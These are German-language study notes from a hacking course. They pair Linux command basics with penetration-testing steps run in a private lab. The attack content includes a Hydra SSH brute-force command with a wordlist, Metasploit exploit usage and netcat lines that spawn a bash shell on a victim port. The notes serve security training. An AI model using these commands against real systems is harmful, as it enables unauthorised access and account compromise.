Heise Hacking Kurs LinkedIn Learning
Testumgebung:
Windows-Rechner:
IP-Adresse: 10.1.1.129
MAC-Adresse: BA-F0-EC-81-03-92
Kali-Linux:
IP-Adresse: 10.1.1.128
MAC-Adresse: FE-3A-E0-10-0E-35
Serverschutz Bausteine von BSI
Schichtenmodel TCP/IP
Infos
Generell
127.0.0.1 = localhost : Jedes Paket geht wieder zurück auf den sendenden Rechner
Wireshark
ARP = Address Resolution Protocol dient dazu MAC adressen auszulesen
Befehle:
Befehl | Beispiel | |
sipcalc | sipcalc 192.168.178.0/24 | Stellt die Subnetzmaske mit den IP-Adressen dar |
ls -la | grep | ls -la | grep go | Gibt dann nur Inhalte wieder, die go enthalten |
find | find . | Gibt alles aus |
find . | grep | find . | grep go | Findet alles in Laufwerk und gibt aber nur inhalte mit go zurück |
locate | Suche über die gesamte Festplatte | |
pwd | pwd | Print Working Directory - Aktuelles laufwerk anzeigen |
whoami | whoami | Aktueller Benutzer |
cd | cd | Springt direkt ins homeverzeichnis |
ps aux | Zeigt Prozesse an | |
ps aux | grep apache2 | Zeigt alles mit apache2 an | |
cat | Zeigt dateiinhalt an | |
cat | cat > hackingskills cat >> hackingskills |
Erstellt eine Datei direkt |
grep | sudo cat /etc/config-datei | grep output |
Sucht nach dem String Output |
nl |
zeigt den inhalt einer datei mit den Zeilennummern an. Kann auch mit grep verbunden werden |
|
sed |
|
Linux Hilfe
aircrack-ng | aircrack-ng --help | more |
Zeigt die HIlfe an mit jeder seite q für Beenden |
man aircrack-ng | Zeigt das Manual an |
Finden in Linux
locate
- locate apache2.conf
zeit an wo dateien liegen. (Datenbank aktualisieren: updatedb
)whereis
- whereis nmap
which
- which nmap
find
- find / -type f -name apache2
Zeigt f = Dateien an die im / Homeverzeichnis liegen. Mit sudo werden alle dateien gefunden. find
- find /etc -tpye -f -name apache2.*
findet alles in etc mit dem Namen apache2
Berechtigungen
-rw-r--r-- 1 dapelza dapelza 0 31. Jan 10:19 test.txt
Berechtigung User Gruppe Größe Datum Dateiname
3 Bits Besitzer 3 Bits Gruppe 3 Bits alle anderen
Bit | Berechtigung | |
r | Read | |
w | Write | |
x | Execute (Ausführen) | |
Berechtigung ändern | ||
chmod +x test.txt | Alle dürfen ausführen | |
chmod -x test.txt | Berechtiung nehmen | |
chmod u+x test.txt | Nur der User darf die Datei ausführen | |
chmod g+x test.txt | Gruppe darf ausführen |
Phasen des Hacking
Passives Scannen
hunter.io
Email-Adressen von Unternehmen herausfinden
Burp Suite
Zum Auslesen von Http Code über einen Proxy
DefaultCreds-cheat-sheet
Webseiten überprüfen
Aktives Scannen
Nmap
Parameter | Kommentar |
nmap -sn 10.1.1.0/24 |
Pingt einen ip-Bereich und gibt die Teilnehmer wieder. |
nmap 10.1.1.136 -v | Vorher schon ergebnisse Anzeigen |
nmap 10.1.1.136 -oN /pfad/zur/datei | speichert die ergebnisse in einer Datei ab |
nmap 10.1.1.136 -p40,21 | können bestimmte Ports gescannt werden |
nmap 10.1.1.136 -sU | Scannta auch udap |
nmap 10.1.1.136 -A | Führt scripte aus |
Dirbuster
Scannt nach unterverzeichnisen auf einer Domain
Im internet nach Exploits suchen
Beispiel: exploitdb Wordpress 4.9
searchsploit
findet schwachstellen in einer Software
smbmap
findet schwachstellen in der SMB freigabe
smbmap -u '' -H 10.0.2.9
-u '' = User aber nicht angeben.
Enum4Linux
findet usernamen
enum4linux 10.1.1.150 -U
Hydra
Brutforce auf ssh oder smb
hydra -l jan -P /usr/share/wordlist/rockyou.txt ssh://10.1.1.12 -t 4
Exploit-Datenbanken
www.exploit-db.com
www.cvedetails.com
Exploits
Metasploit framework
msfconsole
Bevor man mit msf los legt:
Datenbank starten
sudo msfdb init
Postgressql dienst starten
sudo systemctl start postgresql
Metasploit verwenden
search proftp
use exploit/windwos/ftp/proftp_banner
oder
use 4
danach:
options
set Rhosts
show payloads
show targets
Netcat
Opfer
nc -lvp 4444
- Damit kann man generell auf eine Verbindung lauschen
nc -lvp 4444 -e /bin/bash
- Würde bei Verbindung eine Shell starten
Angreifer
nc 10.1.1.138 4444
- Stellt eine Verbindung zum lauschenden Opfer auf dem Port 4444 her
Pentest MOnkey reverse shell
Tools
SED
Suchen und ersetzen